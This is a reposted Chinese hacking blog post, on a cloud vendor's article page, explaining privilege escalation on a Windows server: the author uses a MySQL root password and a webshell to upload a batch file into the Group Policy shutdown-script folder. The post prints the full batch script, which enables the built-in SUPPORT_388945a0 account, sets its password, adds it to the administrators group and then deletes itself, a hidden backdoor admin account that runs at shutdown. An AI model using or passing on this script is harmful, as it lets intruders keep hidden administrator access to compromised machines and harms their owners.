提权思路——mysql root账号上传bat到组策略关机脚本提权

本文涉及的产品
RDS MySQL Serverless 基础系列,0.5-2RCU 50GB
云数据库 RDS MySQL,高可用系列 2核4GB
云数据库 RDS PostgreSQL,高可用系列 2核4GB
简介:

 嗯,组策略关机脚本貌似是很长时间之前在某个留后门的动画中看到的。

今天遇到一个情况,得到了mysql的root密码,但是由于杀软,mysql backdoor和udf都无法使用,于是去尝试了下很久之前的一个想法。
嘛嘛,先来说说组策略关机脚本是什么东西。开始运行→gpedit.msc,在windows设置里就可以看到关机脚本(当然还有开机的)。
这个和启动项是一样的,不同的是这个关机时才会运行,隐藏性更好。

现在我们来看看它在哪,在这里C:\WINDOWS\System32\GroupPolicy\Machine\Scripts\Shutdown,所以我们只要把bat上传到这个文件夹里就行了。

上传的功能webshell自己就带,mysql上传下载

upto填路径,文件名很重要,然后选择文件就选择自己写的bat就好了,这里给大家提供一个乱写的bat,可能有错误哈。
@title SQLCHECK
@echo off
@net user SUPPORT_388945a0 /active:yes
@net user SUPPORT_388945a0 my1234!@#$
@net localgroup administrators SUPPORT_388945a0 /add
@pushd C:\WINDOWS\System32\GroupPolicy\Machine\Scripts\Shutdown
@del sqlcheck.bat
@exit
@exit
@exit出现两次是有原因的。

需要注意的是必须有SUPPORT_388945a0这个内置的账号

我们可以用webshell看看有没有上传成功,已经有了。不知道为什么我用的webshell上传两个bat在一起,也许只是我shell的问题吧。多写一行应该能避免错误。

    

额 还是新手可能还有错误,欢迎指正。















本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/571092,如需转载请自行联系原作者

相关实践学习
每个IT人都想学的“Web应用上云经典架构”实战
本实验从Web应用上云这个最基本的、最普遍的需求出发,帮助IT从业者们通过“阿里云Web应用上云解决方案”,了解一个企业级Web应用上云的常见架构,了解如何构建一个高可用、可扩展的企业级应用架构。
MySQL数据库入门学习
本课程通过最流行的开源数据库MySQL带你了解数据库的世界。   相关的阿里云产品:云数据库RDS MySQL 版 阿里云关系型数据库RDS(Relational Database Service)是一种稳定可靠、可弹性伸缩的在线数据库服务,提供容灾、备份、恢复、迁移等方面的全套解决方案,彻底解决数据库运维的烦恼。 了解产品详情: https://www.aliyun.com/product/rds/mysql 
相关文章
|
9月前
|
关系型数据库 MySQL Shell
MySQL 备份 Shell 脚本:支持远程同步与阿里云 OSS 备份
一款自动化 MySQL 备份 Shell 脚本,支持本地存储、远程服务器同步(SSH+rsync)、阿里云 OSS 备份,并自动清理过期备份。适用于数据库管理员和开发者,帮助确保数据安全。
|
7月前
|
关系型数据库 MySQL Linux
实现MySQL数据库的定时自动备份脚本。
拿走,不谢,这个脚本配方(指引)保证你的数据库数据像蛋糕店一样地天天更新,还能确保老旧的蛋糕(数据)不会堆积满仓库。这下可好,数据安全有保障,数据库管理员也能轻松一点,偶尔闲下来的时候,煮杯咖啡,看个剧岂不美哉?别忘了偶尔检查一下你的自动备份是否正常工作,以防万一蛋糕机器出了点小差错。
343 20
|
7月前
|
Ubuntu 关系型数据库 MySQL
mysql8.0安装初始化不需要设定root密码?
uubntu 的mysql安装完成后无法设定root密码
424 10
|
11月前
|
SQL 安全 关系型数据库
MySQL UDF提权
通过这些内容的详细介绍和实际案例分析,希望能帮助您深入理解MySQL UDF提权的机制、实现步骤及防范措施,提高系统的安全性和防护能力。
682 11
|
SQL 关系型数据库 MySQL
|
SQL 关系型数据库 MySQL
MySQL数据库中给表添加字段并设置备注的脚本编写
通过上述步骤,你可以在MySQL数据库中给表成功添加新字段并为其设置备注。这样的操作对于保持数据库结构的清晰和最新非常重要,同时也帮助团队成员理解数据模型的变化和字段的具体含义。在实际操作中,记得调整脚本以适应具体的数据库和表名称,以及字段的详细规范。
426 8
|
存储 关系型数据库 MySQL
【赵渝强老师】解决MySQL丢失root用户密码
本文介绍了MySQL数据库中用户密码存储的变化,以及如何通过特殊方法重置root用户的密码。从MySQL 5.7版本开始,密码字段由“password”改为“authentication_string”。文章详细列出了重置密码的步骤,并提供了相关代码示例和视频教程。
379 0
|
SQL 关系型数据库 MySQL
mysql编写sql脚本:要求表没有主键,但是想查询没有相同值的时候才进行插入
mysql编写sql脚本:要求表没有主键,但是想查询没有相同值的时候才进行插入
124 0
|
存储 关系型数据库 MySQL
实战!MySQL主从复制一键搭建脚本分享
实战!MySQL主从复制一键搭建脚本分享
247 2
|
关系型数据库 MySQL Shell
MySQL数据库一键安装脚本,适合任何版本
MySQL数据库一键安装脚本,适合任何版本
772 2

推荐镜像

更多